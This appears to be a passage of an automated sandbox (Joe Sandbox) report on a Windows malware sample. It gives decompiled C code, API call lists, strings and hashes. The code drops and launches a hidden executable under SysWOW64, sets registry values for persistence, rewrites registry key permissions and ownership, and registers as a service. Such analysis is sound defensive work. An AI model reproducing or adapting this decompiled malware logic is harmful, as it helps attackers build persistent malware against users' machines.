												wsprintfA( &_v372, "%X%08X", _v28, _v32);
												lstrcatA( &_v1272, E00322544(_t459, 0x330a28, 4, 0xe4, 0xc8));
												E0032EE2A(_t438, _t459, 0, _t454);
												_t469 = _t469 + 0x30;
												lstrcatA( &_v1272,  &_v372);
											}
										}
										_t344 = CreateProcessA(0,  &_v1272, 0, 0, 0, 0x8000000, 0, 0,  &_v772,  &_v64);
										__eflags = _t344;
										if(_t344 == 0) {
											DeleteFileA( &_v672);
											_v36 = 0;
										}
										__eflags = _v16 - 1;
										if(_v16 == 1) {
											__eflags = _v20;
											if(_v20 == 0) {
												E003296FF(_t438);
											}
										}
										goto L82;
									}
									__eflags = _v112;
									if(_v112 != 0) {
										goto L61;
									}
									goto L60;
								}
								_t379 = GetTempPathA(0x1f4,  &_v1272);
								_t494 = _t379;
								if(_t379 == 0) {
									goto L55;
								}
								_t383 = E003299D2(_t449, _t494,  &_v1272,  &_v672,  &_v704, _v8, _v12);
								_t467 = _t467 + 0x14;
								if(_t383 == 0) {
									goto L55;
								}
								_v80 = 0;
								if(_v16 < 3 || _v372 == 0) {
									_push(0);
									_push( &_v80);
									_push(E00326DC2(_t438) ^ 0x61616161);
									E0032F133();
									_t474 = _t467 + 0xc;
									lstrcpyA( &_v372, E00326CC9(_t438));
									lstrcatA( &_v372,  &_v80);
									lstrcatA( &_v372,  &E0033070C);
									_t396 = 0;
									__eflags = 0;
									goto L43;
								} else {
									_t410 =  &_v372;
									_t450 = _t410 + 1;
									do {
										_t441 =  *_t410;
										_t410 = _t410 + 1;
									} while (_t441 != 0);
									_t411 = _t410 - _t450;
									if(_t411 > 0 &&  *((char*)(_t464 + _t411 - 0x171)) == 0x5c) {
										_t411 = _t411 - 1;
									}
									_t451 = _t411;
									if(_t411 <= 0) {
										L41:
										_t449 = _t451 - _t411;
										_a12 = _t451 - _t411;
										E0032EE08( &_v80, _t464 + _t411 - 0x170, _t451 - _t411);
										 *((char*)(_t464 + _a12 - 0x4c)) = 0;
										_t474 = _t467 + 0xc;
										_t396 = 1;
										L43:
										if(_v44 == 0 || _v48 < 0x50) {
											_t438 = 1;
											__eflags = 1;
										} else {
											_t438 = 0;
										}
										_push(_t438);
										_push(_t396);
										_push( &_v372);
										_push( &_v80);
										_push( &_v672);
										_push( &_v704);
										_t401 = E00329326(_t438, _t449);
										_t467 = _t474 + 0x18;
										if(_t401 == 0) {
											_t402 =  *0x33217c; // 0x0
											_v32 = _t402;
											_t403 =  *0x332180; // 0x0
											goto L54;
										} else {
											if(GetFileAttributesExA( &_v672, 0,  &(_v772.dwXCountChars)) != 0) {
												_t403 = 0x61080108;
												 *0x332180 = 0x61080108;
												 *0x33217c = 0;
												_v32 = 0;
												L54:
												_v28 = _t403;
												DeleteFileA( &_v672);
												goto L55;
											}
											_t459 = 1;
											if(_v16 == 1) {
												E003296FF(_t438);
											}
											_v36 = _t459;
											goto L83;
										}
									} else {
										_t442 =  &_v372;
										while( *((char*)(_t442 + _t411 - 1)) != 0x5c) {
											_t411 = _t411 - 1;
											if(_t411 > 0) {
												continue;
											}
											goto L41;
										}
										goto L41;
									}
								}
							}
						}
					}
					_t417 = _v8;
					_t454 = _t417 + 3;
					_v372 = 0;
					if( *((char*)(_t417 + 3)) != 0x22) {
						_t418 = E0032ED03(_t454, 0x20);
						_pop(_t438);
						__eflags = _t418;
						if(_t418 == 0) {
							_t418 =  &(_a12[lstrlenA(_a12)]);
							__eflags = _t418;
						}
						_t459 = _t418 - _v8;
						__eflags = _t459;
						E0032EE08( &_v372, _t454, _t459 - 3);
						 *((char*)(_t464 + _t459 - 0x173)) = 0;
						L13:
						_t467 = _t467 + 0xc;
						L14:
						if(_v372 != 0 && _v672 != 0) {
							_t424 = E0032675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							if(_t424 != 0 && _v12 != 0) {
								_t426 = E00326A60(_t449,  &_v372, _t424, _v12);
								_t467 = _t467 + 0xc;
								_v12 = _t426;
							}
						}
						goto L19;
					}
					_t454 = _t417 + 4;
					_t428 = E0032ED03(_t417 + 4, 0x22);
					_pop(_t438);
					if(_t428 == 0) {
						goto L14;
					} else {
						_t459 = _t428 - _v8;
						E0032EE08( &_v372, _t454, _t459 - 4);
						 *((char*)(_t464 + _t459 - 0x174)) = 0;
						goto L13;
					}
				}
			}

0x00329a7f
0x00329a83
0x00329a8a
0x00329a90
0x00329a97
0x00329a9d
0x0032a3cc
0x0032a3d2
0x0032a41c
0x0032a42c
0x0032a43a
0x0032a440
0x0032a448
0x0032a452
0x0032a45a
0x0032a469
0x0032a46b
0x0032a470
0x0032a475
0x0032a47a
0x0032a48a
0x0032a48c
0x0032a497
0x0032a497
0x0032a49d
0x00000000
0x00000000
0x0032a49f
0x0032a4a7
0x0032a4ac
0x0032a4be
0x0032a4c3
0x00000000
0x0032a4c3
0x0032a4ae
0x0032a4ae
0x0032a4b3
0x0032a4b5
0x0032a4b9
0x0032a4b9
0x00000000
0x0032a4b5
0x0032a497
0x0032a3da
0x0032a406
0x0032a407
0x0032a409
0x0032a40b
0x00000000
0x00000000
0x0032a3e8
0x0032a3eb
0x00000000
0x00000000
0x0032a3ed
0x0032a3f3
0x0032a3f6
0x00000000
0x00000000
0x0032a3f8
0x0032a3f8
0x0032a3f8
0x0032a400
0x0032a400
0x0032a414
0x0032a419
0x00000000
0x00329aa3
0x00329ab0
0x00329ac2
0x00329ac4
0x00329ac4
0x00329ad1
0x00329ae1
0x00329aef
0x00329af4
0x00329af9
0x00329afb
0x00329afb
0x00329af9
0x00329afd
0x00329b14
0x00329b1a
0x00329b26
0x00329b2b
0x00329b33
0x00329b36
0x00329b3b
0x00329b41
0x00329c26
0x00329c2b
0x00329c2e
0x00329c33
0x0032a1de
0x0032a1e4
0x0032a1fd
0x0032a211
0x0032a214
0x0032a219
0x0032a21c
0x0032a21f
0x0032a2e2
0x0032a305
0x0032a308
0x0032a30d
0x0032a310
0x0032a313
0x0032a35a
0x0032a35a
0x0032a35f
0x0032a361
0x0032a3c2
0x00329c05
0x00329c06
0x00329c06
0x0032a363
0x0032a369
0x0032a397
0x0032a397
0x0032a39d
0x0032a3a3
0x0032a3aa
0x0032a3b1
0x0032a3b4
0x0032a3b7
0x00000000
0x0032a3b7
0x0032a36b
0x0032a371
0x0032a374
0x0032a374
0x0032a376
0x0032a377
0x0032a377
0x0032a37d
0x0032a380
0x00000000
0x00000000
0x0032a38e
0x0032a394
0x00000000
0x0032a394
0x0032a318
0x0032a31e
0x0032a324
0x0032a325
0x0032a327
0x0032a339
0x0032a33b
0x0032a33d
0x0032a340
0x0032a344
0x0032a344
0x0032a34c
0x0032a351
0x0032a354
0x00000000
0x0032a354
0x0032a329
0x0032a32b
0x0032a32e
0x0032a32e
0x0032a330
0x0032a331
0x0032a331
0x0032a337
0x0032a337
0x00000000
0x0032a337
0x0032a228
0x0032a22b
0x0032a231
0x0032a234
0x0032a237
0x0032a27a
0x0032a280
0x0032a281
0x0032a283
0x0032a28e
0x0032a28e
0x0032a28e
0x0032a291
0x0032a294
0x0032a297
0x0032a2a5
0x0032a2ad
0x0032a2b4
0x0032a2b4
0x0032a2b7
0x0032a2b7
0x0032a2bd
0x0032a2d0
0x0032a2d5
0x0032a2d5
0x0032a2d8
0x00000000
0x0032a2d8
0x0032a242
0x0032a245
0x0032a24b
0x0032a24c
0x0032a24e
0x00000000
0x00000000
0x0032a253
0x0032a264
0x0032a26c
0x00000000
0x0032a26c
0x00329c39
0x00329c3f
0x0032a167
0x0032a183
0x0032a190
0x0032a196
0x0032a198
0x0032a198
0x0032a1a2
0x0032a1b3
0x0032a1b6
0x0032a1bc
0x0032a1bf
0x0032a1c7
0x0032a1cc
0x0032a1cc
0x0032a1bf
0x0032a1a2
0x00000000
0x00329c54
0x00329c56
0x00329c5b
0x00329c62
0x00000000
0x00000000
0x00329c74
0x00329c79
0x00329c7c
0x00329c81
0x00000000
0x00329c90
0x00329c94
0x00329c97
0x00329c9a
0x00329e3e
0x00329e3e
0x00329e42
0x0032a155
0x0032a158
0x0032a15d
0x0032a161
0x00000000
0x00000000
0x00000000
0x0032a161
0x00329e66
0x00329e6b
0x00329e75
0x00329e77
0x0032a14a
0x0032a14d
0x0032a152
0x00000000
0x0032a152
0x00329e98
0x00329e9d
0x00329ea0
0x00329ea2
0x00000000
0x00000000
0x00329eab
0x00329eb0
0x00329ec1
0x00329ec8
0x00329ed5
0x00329edb
0x00329ee3
0x00329ee4
0x00329ee8
0x00329eeb
0x00329ef2
0x00329ef9
0x00329efc
0x00329efd
0x00329f03
0x00329f03
0x00329f08
0x00329f09
0x00329f0e
0x00329f11
0x00329f2d
0x00329f32
0x00329f3b
0x00329f41
0x00329f44
0x00329f46
0x00329f4b
0x00329f4b
0x00329f67
0x00329f6a
0x00329f6a
0x00329f73
0x00329f82
0x00329f8e
0x00329f98
0x00329f9d
0x00329fb4
0x00329fba
0x00329fbc
0x00329fc2
0x00329fc9
0x00329fcf
0x00329fd2
0x00329fd4
0x00329fda
0x00329fda
0x00329fdd
0x00329fe1
0x00329fe7
0x00329feb
0x00329ff1
0x00329ff4
0x00329ff8
0x00329ffb
0x00329ffe
0x0032a004
0x0032a007
0x0032a010
0x0032a025
0x0032a038
0x0032a041
0x0032a046
0x0032a049
0x0032a050
0x0032a05e
0x0032a05e
0x0032a072
0x0032a078
0x0032a07f
0x0032a08d
0x0032a08d
0x0032a093
0x0032a093
0x0032a007
0x00329feb
0x00329fe1
0x0032a09a
0x0032a09d
0x0032a09f
0x0032a0a2
0x0032a0b6
0x0032a0de
0x0032a0e7
0x0032a0ec
0x0032a0fd
0x0032a0fd
0x0032a0a2
0x0032a120
0x0032a126
0x0032a128
0x0032a131
0x0032a137
0x0032a137
0x0032a13a
0x0032a13e
0x0032a140
0x0032a143
0x0032a145
0x0032a145
0x0032a143
0x00000000
0x0032a13e
0x00329ef4
0x00329ef7
0x00000000
0x00000000
0x00000000
0x00329ef7
0x00329cac
0x00329cb2
0x00329cb4
0x00000000
0x00000000
0x00329cd5
0x00329cda
0x00329cdf
0x00000000
0x00000000
0x00329ce9
0x00329cec
0x00329d58
0x00329d59
0x00329d64
0x00329d65
0x00329d6a
0x00329d7a
0x00329d8b
0x00329d9d
0x00329da3
0x00329da3
0x00000000
0x00329cf6
0x00329cf6
0x00329cfc
0x00329cff
0x00329cff
0x00329d01
0x00329d02
0x00329d06
0x00329d0a
0x00329d16
0x00329d16
0x00329d17
0x00329d1b
0x00329d2f
0x00329d2f
0x00329d3e
0x00329d41
0x00329d49
0x00329d4f
0x00329d52
0x00329da5
0x00329da8
0x00329db6
0x00329db6
0x00329db0
0x00329db0
0x00329db0
0x00329db7
0x00329db8
0x00329dbf
0x00329dc3
0x00329dca
0x00329dd1
0x00329dd2
0x00329dd7
0x00329ddc
0x00329e21
0x00329e26
0x00329e29
0x00000000
0x00329dde
0x00329df5
0x00329e0c
0x00329e11
0x00329e16
0x00329e1c
0x00329e2e
0x00329e2e
0x00329e38
0x00000000
0x00329e38
0x00329df9
0x00329dfd
0x00329dff
0x00329dff
0x00329e04
0x00000000
0x00329e04
0x00329d1d
0x00329d1d
0x00329d23
0x00329d2a
0x00329d2d
0x00000000
0x00000000
0x00000000
0x00329d2d
0x00000000
0x00329d23
0x00329d1b
0x00329cec
0x00329c81
0x00329c3f
0x00329b47
0x00329b4a
0x00329b4d
0x00329b56
0x00329b8b
0x00329b91
0x00329b92
0x00329b94
0x00329b9f
0x00329b9f
0x00329b9f
0x00329ba4
0x00329ba4
0x00329bb3
0x00329bb8
0x00329bbf
0x00329bbf
0x00329bc2
0x00329bc8
0x00329bde
0x00329be3
0x00329be8
0x00329bfa
0x00329bff
0x00329c02
0x00329c02
0x00329be8
0x00000000
0x00329bc8
0x00329b58
0x00329b5e
0x00329b64
0x00329b67
0x00000000
0x00329b69
0x00329b6b
0x00329b7a
0x00329b7f
0x00000000
0x00329b7f
0x00329b67

APIs

SetErrorMode.KERNELBASE(00000003), ref: 00329A7F
SetErrorMode.KERNELBASE(00000003), ref: 00329A83
SetUnhandledExceptionFilter.KERNELBASE(00326511), ref: 00329A8A

Part of subcall function 0032EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0032EC5E
Part of subcall function 0032EC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0032EC72
Part of subcall function 0032EC54: GetTickCount.KERNEL32 ref: 0032EC78

GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00329AB3
GetModuleFileNameA.KERNEL32(00000000), ref: 00329ABA
GetCommandLineA.KERNEL32 ref: 00329AFD
lstrlenA.KERNEL32(?), ref: 00329B99
ExitProcess.KERNEL32 ref: 00329C06
GetTempPathA.KERNEL32(000001F4,?), ref: 00329CAC
lstrcpyA.KERNEL32(?,00000000), ref: 00329D7A
lstrcatA.KERNEL32(?,?), ref: 00329D8B
lstrcatA.KERNEL32(?,0033070C), ref: 00329D9D
GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00329DED
DeleteFileA.KERNEL32(00000022), ref: 00329E38
GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00329E6F
lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00329EC8
lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00329ED5
RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00329F3B
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00329F5E
RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00329F6A
GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00329FAD
GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00329FB4
GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00329FFE
lstrcatA.KERNEL32(00000022,00000000), ref: 0032A038
lstrcatA.KERNEL32(00000022,00330A34), ref: 0032A05E
lstrcatA.KERNEL32(00000022,00000022), ref: 0032A072
lstrcatA.KERNEL32(00000022,00330A34), ref: 0032A08D
wsprintfA.USER32 ref: 0032A0B6
lstrcatA.KERNEL32(00000022,00000000), ref: 0032A0DE
lstrcatA.KERNEL32(00000022,?), ref: 0032A0FD
CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0032A120
DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0032A131
GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0032A174
GetModuleFileNameA.KERNEL32(00000000), ref: 0032A17B
GetDriveTypeA.KERNEL32(00000022), ref: 0032A1B6
GetCommandLineA.KERNEL32 ref: 0032A1E5

Part of subcall function 003299D2: lstrcpyA.KERNEL32(?,?,00000100,003322F8,00000000,?,00329E9D,?,00000022,?,?,?,?,?,?,?), ref: 003299DF
Part of subcall function 003299D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00329E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00329A3C
Part of subcall function 003299D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00329E9D,?,00000022,?,?,?), ref: 00329A52

lstrlenA.KERNEL32(?), ref: 0032A288
StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0032A3B7
GetLastError.KERNEL32 ref: 0032A3ED
Sleep.KERNEL32(000003E8), ref: 0032A400
DeleteFileA.KERNELBASE(003333D8), ref: 0032A407
CreateThread.KERNELBASE(00000000,00000000,0032405E,00000000,00000000,00000000), ref: 0032A42C
WSAStartup.WS2_32(00001010,?), ref: 0032A43A
CreateThread.KERNELBASE(00000000,00000000,0032877E,00000000,00000000,00000000), ref: 0032A469
Sleep.KERNELBASE(00000BB8), ref: 0032A48A
GetTickCount.KERNEL32 ref: 0032A49F
GetTickCount.KERNEL32 ref: 0032A4B7
Sleep.KERNELBASE(00002710), ref: 0032A4C3

Strings

P, xrefs: 00329DAA
", xrefs: 0032A189
C:\Windows\SysWOW64\shayesoq\lagavljy.exe, xrefs: 0032A1D9
", xrefs: 00329EDB
shayesoq, xrefs: 0032A389, 0032A397
%X%08X, xrefs: 0032A0B0
", xrefs: 0032A078
D, xrefs: 00329F8E
\, xrefs: 00329D0C

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
String ID: "$"$"$%X%08X$C:\Windows\SysWOW64\shayesoq\lagavljy.exe$D$P$\$shayesoq
API String ID: 2089075347-2930078742
Opcode ID: 680cfd0bf0219dc6cccd76a315327eb7178b426c2a7d19b9eef51390d54cced2
Instruction ID: 266f482e1eb4861617a03dbf64e19a116de72a9d350ed5e83a23c9800a2e1c1c
Opcode Fuzzy Hash: 680cfd0bf0219dc6cccd76a315327eb7178b426c2a7d19b9eef51390d54cced2
Instruction Fuzzy Hash: 685282B1D40269AFDF17DFA4EC8AEEE7BBCAF04300F1544A6F509E6141E7709A448B61

Uniqueness

Uniqueness Score: -1.00%

Function 0032199C, Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 106
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E0032199C(void* __eax) {
				long _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				void* _v24;
				long _v28;
				struct HINSTANCE__* _t27;
				_Unknown_base(*)()* _t30;
				intOrPtr _t32;
				void* _t34;
				void* _t41;
				struct HINSTANCE__* _t48;
				_Unknown_base(*)()* _t49;
				void* _t50;

				_v20 = 0;
				_v28 = 0;
				__imp__#11("123.45.67.89");
				_v24 = __eax;
				_t27 = LoadLibraryA("Iphlpapi.dll"); // executed
				_t48 = _t27;
				_v16 = _t48;
				if(_t48 != 0) {
					_v12 = GetProcAddress(_t48, "GetAdaptersInfo");
					_t49 = GetProcAddress(_t48, "GetIfEntry");
					_t30 = GetProcAddress(_v16, "GetBestInterface");
					if(_v12 == 0 || _t49 == 0 || _t30 == 0) {
						FreeLibrary(_v16);
						goto L21;
					} else {
						 *_t30(_v24,  &_v20); // executed
						_t34 = GetProcessHeap();
						_v24 = _t34;
						if(_t34 == 0) {
							L21:
							_t32 = 0;
							L22:
							return _t32;
						}
						_t50 = HeapAlloc(_t34, 0, 0x288);
						if(_t50 == 0) {
							goto L21;
						}
						_push( &_v8);
						_push(_t50);
						_v8 = 0x288;
						if(_v12() == 0x6f) {
							_t50 = HeapReAlloc(_v24, 0, _t50, _v8);
						}
						if(_t50 == 0) {
							L18:
							FreeLibrary(_v16);
							if(_v28 == 0) {
								goto L21;
							}
							_t32 = 1;
							goto L22;
						} else {
							_push( &_v8);
							_push(_t50); // executed
							if(_v12() != 0) {
								goto L18;
							}
							_t41 = _t50;
							while( *((intOrPtr*)(_t41 + 0x19c)) != _v20) {
								_t41 =  *_t41;
								if(_t41 != 0) {
									continue;
								}
								L17:
								HeapFree(_v24, 0, _t50);
								goto L18;
							}
							if( *((intOrPtr*)(_t41 + 0x1a0)) != 6) {
								_v28 = 1;
							}
							goto L17;
						}
					}
				}
				return 0;
			}

0x003219ab
0x003219ae
0x003219b1
0x003219bc
0x003219bf
0x003219c5
0x003219c7
0x003219cc
0x003219ea
0x003219f7
0x003219f9
0x003219fe
0x00321ab6
0x00000000
0x00321a14
0x00321a1b
0x00321a1d
0x00321a23
0x00321a28
0x00321abc
0x00321abc
0x00321abe
0x00000000
0x00321abe
0x00321a3c
0x00321a40
0x00000000
0x00000000
0x00321a45
0x00321a46
0x00321a47
0x00321a50
0x00321a60
0x00321a60
0x00321a67
0x00321aa1
0x00321aa4
0x00321aad
0x00000000
0x00000000
0x00321aaf
0x00000000
0x00321a69
0x00321a6c
0x00321a6d
0x00321a73
0x00000000
0x00000000
0x00321a75
0x00321a77
0x00321a82
0x00321a86
0x00000000
0x00000000
0x00321a96
0x00321a9b
0x00000000
0x00321a9b
0x00321a91
0x00321a93
0x00321a93
0x00000000
0x00321a91
0x00321a67
0x003219fe
0x00000000

APIs

inet_addr.WS2_32(123.45.67.89), ref: 003219B1
LoadLibraryA.KERNELBASE(Iphlpapi.dll,?,?,?,?,00000001,00321E9E), ref: 003219BF
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 003219E2
GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 003219ED
GetProcAddress.KERNEL32(?,GetBestInterface), ref: 003219F9
GetBestInterface.IPHLPAPI(?,?,?,?,?,?,00000001,00321E9E), ref: 00321A1B
GetProcessHeap.KERNEL32(?,?,?,?,00000001,00321E9E), ref: 00321A1D
HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00321E9E), ref: 00321A36
GetAdaptersInfo.IPHLPAPI(00000000,00321E9E,?,?,?,?,00000001,00321E9E), ref: 00321A4A
HeapReAlloc.KERNEL32(?,00000000,00000000,00321E9E,?,?,?,?,00000001,00321E9E), ref: 00321A5A
GetAdaptersInfo.IPHLPAPI(00000000,00321E9E,?,?,?,?,00000001,00321E9E), ref: 00321A6E
HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00321E9E), ref: 00321A9B
FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00321E9E), ref: 00321AA4

Strings

localcfg, xrefs: 003219A3
123.45.67.89, xrefs: 003219A6
GetBestInterface, xrefs: 003219EF
Iphlpapi.dll, xrefs: 003219B7
GetIfEntry, xrefs: 003219E4
~s`ysps, xrefs: 003219B1
GetAdaptersInfo, xrefs: 003219DC

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AddressProc$AdaptersAllocFreeInfoLibrary$BestInterfaceLoadProcessinet_addr
String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg$~s`ysps
API String ID: 293628436-819159683
Opcode ID: 10b1fea2c06966ed2cc929f58eb35e6bf91054f09cd0085df72a243c234e78eb
Instruction ID: a0f3434d60506ca5efd889b031b99c28d6a1cddd60a0651cabbc5e5e94f9c39c
Opcode Fuzzy Hash: 10b1fea2c06966ed2cc929f58eb35e6bf91054f09cd0085df72a243c234e78eb
Instruction Fuzzy Hash: 79314B36D01269AFCB169FE4EED88BFBBB9EF65301F250569E501E2110D7704E41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00327A95, Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 269
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00327A95(void* _a4, char* _a8, signed int _a12) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				struct _ACL* _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				int _v64;
				void _v132;
				char _v388;
				char _v516;
				struct _SECURITY_DESCRIPTOR _v1540;
				long _t92;
				void* _t95;
				void* _t104;
				void* _t107;
				void* _t111;
				void* _t116;
				struct _ACL* _t117;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t123;
				void* _t125;
				char* _t126;
				void* _t130;
				void* _t134;
				void* _t135;
				signed int _t136;
				void* _t143;
				void* _t146;
				int _t148;
				int _t151;
				char* _t158;
				void** _t159;
				void* _t161;
				void* _t164;
				signed int _t172;
				void* _t173;
				char* _t174;
				void* _t175;
				void* _t176;

				_v32 = 0;
				_v12 = 0;
				_v28 = 0;
				_t92 = RegOpenKeyExA(_a4, _a8, 0, 0xe0100,  &_v28); // executed
				if(_t92 != 0) {
					return 0;
				}
				_v40 = 0x80;
				_t95 = GetUserNameA( &_v388,  &_v40);
				__eflags = _t95;
				if(_t95 == 0) {
					L48:
					RegCloseKey(_v28); // executed
					return _v12;
				} else {
					_v36 = 0x44;
					_v44 = 0x80;
					_t104 = LookupAccountNameA(0,  &_v388,  &_v132,  &_v36,  &_v516,  &_v44,  &_v56);
					__eflags = _t104;
					if(_t104 == 0) {
						goto L48;
					}
					_v48 = 0x400;
					_t107 = RegGetKeySecurity(_v28, 5,  &_v1540,  &_v48);
					__eflags = _t107;
					if(_t107 != 0) {
						goto L48;
					}
					_t111 = GetSecurityDescriptorOwner( &_v1540,  &_v16,  &_v60);
					__eflags = _t111;
					if(_t111 == 0) {
						L12:
						_v24 = 0;
						_t116 = GetSecurityDescriptorDacl( &_v1540,  &_v64,  &_v32,  &_v52);
						__eflags = _t116;
						if(_t116 == 0) {
							L47:
							goto L48;
						}
						_t117 = _v32;
						__eflags = _t117;
						if(_t117 == 0) {
							goto L47;
						}
						_t164 = 0;
						_v8 = 0;
						__eflags = 0 - _t117->AceCount;
						if(0 >= _t117->AceCount) {
							goto L47;
						} else {
							goto L15;
						}
						do {
							L15:
							_t118 = GetAce(_t117, _v8,  &_v20);
							__eflags = _t118;
							if(_t118 == 0) {
								L31:
								_t73 =  &_v8;
								 *_t73 = _v8 + 1;
								__eflags =  *_t73;
								goto L32;
							}
							_t172 = 0;
							_v16 = _v20 + 8;
							__eflags = _t164;
							if(_t164 <= 0) {
								L21:
								__eflags = _t164 - 0x20;
								if(_t164 < 0x20) {
									 *((intOrPtr*)(_t176 + _t164 * 4 - 0x100)) = _v16;
									_t164 = _t164 + 1;
									__eflags = _t164;
								}
								_t134 = EqualSid( &_v132, _v16);
								_t159 = _v20;
								__eflags = _t134;
								if(_t134 == 0) {
									_t135 = 0x20000;
								} else {
									asm("sbb eax, eax");
									_t135 = ( ~_a12 & 0x00010006) + 0xe0039;
								}
								__eflags = _t159[1] - _t135;
								if(_t159[1] != _t135) {
									_t159[1] = _t135;
									_t159 = _v20;
									_v24 = 1;
								}
								__eflags =  *_t159;
								if( *_t159 != 0) {
									L30:
									 *_t159 = 0;
									_t136 = _v16;
									__eflags =  *(_t136 + 8);
									_t68 =  *(_t136 + 8) == 0;
									__eflags = _t68;
									_v24 = 1;
									 *((char*)(_v20 + 1)) = 2 + (_t136 & 0xffffff00 | _t68) * 8;
									goto L31;
								} else {
									__eflags = _t159[0] & 0x00000010;
									if((_t159[0] & 0x00000010) == 0) {
										goto L31;
									}
									goto L30;
								}
							} else {
								goto L17;
							}
							while(1) {
								L17:
								_t143 = EqualSid( *(_t176 + _t172 * 4 - 0x100), _v16);
								__eflags = _t143;
								if(_t143 != 0) {
									break;
								}
								_t172 = _t172 + 1;
								__eflags = _t172 - _t164;
								if(_t172 < _t164) {
									continue;
								}
								break;
							}
							__eflags = _t172 - _t164;
							if(_t172 >= _t164) {
								goto L21;
							}
							DeleteAce(_v32, _v8);
							_v24 = 1;
							L32:
							_t117 = _v32;
							__eflags = _v8 - (_t117->AceCount & 0x0000ffff);
						} while (_v8 < (_t117->AceCount & 0x0000ffff));
						__eflags = _v24;
						if(_v24 == 0) {
							goto L47;
						}
						__eflags = "C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe"; // 0x43
						if(__eflags == 0) {
							L41:
							_v12 = 1;
							_t173 = LocalAlloc(0x40, 0x14);
							__eflags = _t173;
							if(_t173 != 0) {
								_t120 = InitializeSecurityDescriptor(_t173, 1);
								__eflags = _t120;
								if(_t120 != 0) {
									_t122 = SetSecurityDescriptorDacl(_t173, 1, _v32, 0);
									__eflags = _t122;
									if(_t122 != 0) {
										_t123 = RegSetKeySecurity(_v28, 4, _t173); // executed
										__eflags = _t123;
										if(_t123 == 0) {
											_v12 = 1;
										}
									}
								}
								LocalFree(_t173);
							}
							goto L47;
						}
						__eflags =  *0x332cc0; // 0x0
						if(__eflags == 0) {
							goto L41;
						}
						_v12 = 0;
						_t125 = RegOpenKeyExA(_a4, _a8, 0, 0x103,  &_v12); // executed
						__eflags = _t125;
						if(_t125 != 0) {
							goto L41;
						}
						_t158 = "C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe";
						_t126 = _t158;
						_t174 =  &(_t126[1]);
						do {
							_t161 =  *_t126;
							_t126 =  &(_t126[1]);
							__eflags = _t161;
						} while (_t161 != 0);
						_t130 = RegSetValueExA(_v12, E00322544(0x3322f8, 0x3306dc, 0xa, 0xe4, 0xc8), 0, 2, _t158, _t126 - _t174 + 1); // executed
						__eflags = _t130;
						if(_t130 == 0) {
							 *0x332cc0 = 0;
						}
						goto L41;
					}
					_t146 = EqualSid( &_v132, _v16);
					__eflags = _t146;
					if(_t146 != 0) {
						goto L12;
					}
					_v12 = 1;
					_t175 = LocalAlloc(0x40, 0x14);
					__eflags = _t175;
					if(_t175 != 0) {
						_t148 = InitializeSecurityDescriptor(_t175, 1);
						__eflags = _t148;
						if(_t148 != 0) {
							_t151 = SetSecurityDescriptorOwner(_t175,  &_v132, 0);
							__eflags = _t151;
							if(_t151 != 0) {
								RegSetKeySecurity(_v28, 1, _t175); // executed
							}
						}
						LocalFree(_t175);
					}
					goto L12;
				}
			}

0x00327aae
